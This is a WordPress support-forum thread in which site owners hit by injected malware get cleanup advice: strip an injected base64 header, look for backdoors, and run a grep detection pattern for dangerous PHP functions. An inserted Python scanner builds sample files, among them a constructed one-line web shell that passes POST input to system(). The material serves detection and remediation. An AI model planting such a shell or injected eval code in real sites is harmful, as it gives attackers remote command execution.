• Hi,
    My website, http://www.mbadecoder.com has been getting all kinds of virus scripts for some reason. The latest one is a message on Chrome which goes:

    http://www.mbadecoder.com contains content from click.clickfeeds.net, a site known to distribute malware. Your computer might catch a virus if you visit this site.
    Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

    How can I figure out what's going wrong? For now it is working on other browsers but a couple of days ago it was just not working on any browser. At that time the message on the home page was:

    Warning: Can not modify header information – headers already sent by (……..)

    Somebody, please help.
    Thanks.

Viewing 15 replies - 1 through 15 (of 17 total)
  • Hi,
    I’ve the same problem in my website: http://www.everythingislovely.fr.
    The problem occurs since yesterday like you.

    I don’t know how to resolve this. Please, help me too!

    Thanks.

    First thing you need to do is FTP into your hosting account, check your main index.php, at the top will be a line of code that looks like

    <?php base64....

    Remove that. Also check the index.php and header.php of each of your theme directories, it’s probably in there as well.

    Once you’ve cleaned it out, you need to locate the backdoor that allowed them to inject the code in your site, usually they hide this somewhere in your images, uploads or plugins directory. You also will need to upgrade wordpress to the latest version if you haven’t already and change all your passwords.

    Thread Starter Nami115

    (@nami115)

    cjchamberland,

    Thanks for your reply. I have removed the extra code and the website is working fine right now.

    The second part that you have asked me to implement – Locating the backdoor to check for how this code came in- can you please tell me how I can go about that.

    Sorry for being silly and stupid, but this is just not my forte and the designer who put together my website is showing me the shoulder 🙁

    Thanks again!

    Nami115, my site was compromised too. I looked through my whole file structure and identified a few files in the cache directory as being suspicious. I’ve changed the names of those files, to see what happens, and while it’s possible that the cache files are not the backdoor, they certainly look like they’re up to no good.

    Cache can be found here: /wp-content/themes/yourtheme/cache

    You should be able to remove all the cache files without issue, but I renamed them to see if I got it right. There was also a suspicious file in the root that was created today and just had a bunch of IP addresses in it. Not sure what that’s all about… will report back if this fix doesn’t work.

    Nami115

    In terminal, try running this:

    grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *\(" /var/www

    Where /var/www is the directory path to your site. So if you download locally modify appropriately. This is not all encompassing but will give you a good idea of what is going on.

    Please note, you might get a lot of false positives so you’ll want to go through each finding and verify what it reports. Working with backdoors is a bit of a bear, best of luck.

    That last file, peosteve, sounds like conditional malware. Parsing traffic by IPs.

    Cheers.
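    The two pieces of advice above (strip the injected `<?php base64...` header from index.php and the theme files, then hunt for the backdoor with a grep over the suspicious PHP functions) can be combined into one scan. The script below is an added example written for this thread, not code posted by any participant and not a Sucuri tool. It uses the same function list as the grep command, additionally flags a PHP file whose first line opens with eval/base64_decode/gzinflate, and flags a file that contains nothing but IP addresses (the kind of file peosteve described). The directory tree it builds in a temp folder, including the file names under wp-content and the payload strings, is constructed for demonstration; point `scan_tree` at a real document root instead to use it. As the thread warns, a hit is a lead, not proof: the sample wp-includes/file.php is a deliberate false positive on fopen.

```python
"""Scan a directory tree for the indicators discussed in the thread.
Added example; sample files and contents are constructed, not real malware."""
import os
import re
import tempfile

# Same function list as the grep command in the thread, as a Python regex.
SUSPICIOUS_CALL = re.compile(
    r"\b(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|"
    r"fclose|readfile|php_uname|eval) *\("
)
# An opening <?php tag followed directly by an eval/decode call on the same
# line: the injected header that sits on top of a legitimate index.php.
INJECTED_HEADER = re.compile(
    r"^\s*<\?php\s*(?:/\*[^*]*\*/\s*)?(?:eval|base64_decode|gzinflate)\s*\(",
    re.IGNORECASE,
)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def scan_file(path):
    """Return a list of (path, line_number, kind) findings for one file."""
    findings = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return findings
    if not lines:
        return findings
    if INJECTED_HEADER.search(lines[0]):
        findings.append((path, 1, "injected-header"))
    non_empty = [ln.strip() for ln in lines if ln.strip()]
    # A file that is only IP addresses (line 0 = whole-file finding).
    if non_empty and all(IPV4.match(ln) for ln in non_empty):
        findings.append((path, 0, "ip-list"))
    for number, line in enumerate(lines, 1):
        if SUSPICIOUS_CALL.search(line):
            findings.append((path, number, "suspicious-call"))
    return findings


def scan_tree(root):
    """Walk root recursively (like grep -R) and collect all findings."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            results.extend(scan_file(os.path.join(dirpath, name)))
    return results


def build_sample_site():
    """Write a constructed, hypothetical site tree to a temp dir and return it."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    samples = {
        # Injected header on top of the real loader (constructed payload).
        "index.php": '<?php eval(base64_decode("aGVsbG8=")); ?>\n'
                     '<?php\nrequire("wp-blog-header.php");\n',
        # Clean theme header: no findings expected.
        "wp-content/themes/mytheme/header.php": "<?php get_header(); ?>\n<html>\n",
        # Web shell hidden in the theme cache directory (constructed).
        "wp-content/themes/mytheme/cache/x.php": "<?php\n$c = $_POST['c'];\n@system( $c );\n",
        # Bare IP list of the kind used by IP-conditional malware (constructed).
        "ips.txt": "203.0.113.5\n198.51.100.7\n",
        # Legitimate-looking code that still trips the grep: a false positive.
        "wp-includes/file.php": "<?php\nfunction wp_open($p) { return fopen($p, 'r'); }\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def kinds_by_file(root):
    """Map relative path -> sorted list of finding kinds, for review."""
    out = {}
    for path, _, kind in scan_tree(root):
        rel = os.path.relpath(path, root).replace(os.sep, "/")
        out.setdefault(rel, set()).add(kind)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    site = build_sample_site()
    for rel, kinds in sorted(kinds_by_file(site).items()):
        print(f"{rel}: {', '.join(kinds)}")
```

    Run it as is to see the report for the constructed tree; each reported file still has to be opened and read, because fopen in wp-includes is normal WordPress code while system() fed from $_POST in a theme cache folder is not.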

    perezbox, thanks for letting me know. I thought it was weird, but figured if there were only a bunch of IP addresses in it, it couldn’t do much on its own…

    what does that grep… command actually do?

    Nami115, still check the cache directory first for suspect entries…and if there’s nothing there, or it’s all normal, follow perezbox.

    GREP allows you to parse the content on your server by keying in for key words, phrases, patterns etc.. it’ll actually go through the files looking to see what it can find.

    I wrote a post here that better explains what I was saying above: http://blog.sucuri.net/2012/06/understanding-conditional-malware-ip-centric-variation.html

    As for not doing anything, sure unless something is referencing it. But then again, it could just be your .htaccess, who knows.. anyway..

    And here is an article demonstrating the things you can do with grep: http://www.thegeekstuff.com/2009/03/15-practical-unix-grep-command-examples/

    Cheers

    It’s a Windows server, so there isn’t an htaccess file. 🙂 I’m guessing those files in cache referenced it, but who knows. Looks like the issue is gone, so I’m happy. 🙂

    Thanks for all the info about grep and for your suggestions!

    Shan

    (@shan-last-shreds-of-sanity)

    @perezbox where do I find this “terminal” area you posted about? Is it in the MySQL or somewhere else in the CPanel? I actually looked in the MySQL but see nothing called “terminal”.

    I have the following tabs in the MySQL part of the CPanel:

    Structure
    SQL
    Search
    Query
    Export
    Import
    Operations

    Help?

    Hi Shan

    What operating system are you running?

    Thanks

    Shan

    (@shan-last-shreds-of-sanity)

    Win7Pro.

    So this is on my PC, NOT in the MySQL Database/PHPMyAdmin, correct? I’m not sure my client will know how to do this herself. LOL But I want to check my machine just to be safe.

    Hi

    Correct, it's on your OS. The terminal on Windows is what you get when you run CMD from the start prompt.

    But the real question is, are you running WordPress on a Windows box or is that where you spend your time. Most WP instances are on a LAMP stack which means it’s on some kind of NIX distro. What I mention above needs to be executed on the box that the site resides.

    Thanks

    Shan

    (@shan-last-shreds-of-sanity)

    Uh…my WP is hosted at Hostgator. How would I find this info out?

    Hi Shan

    You’re going to want to contact your host and ask that question.

    But here is my concern, if you’re stumbling with this I would caution against fiddling on your server. There are a couple of steps you’re going to have to take to connect and make use of the terminal environment, unfortunately each takes time to configure and understand.

    It's because of this that I’d recommend you reach out for help if you need it; it doesn’t sound like you have the technical background to go at it on your end. I could be wrong though, if I am I apologize.

    The last thing I or any one wants is for you to blow up your server.

    Thanks

  • The topic ‘Site hacked by Click feeds?’ is closed to new replies.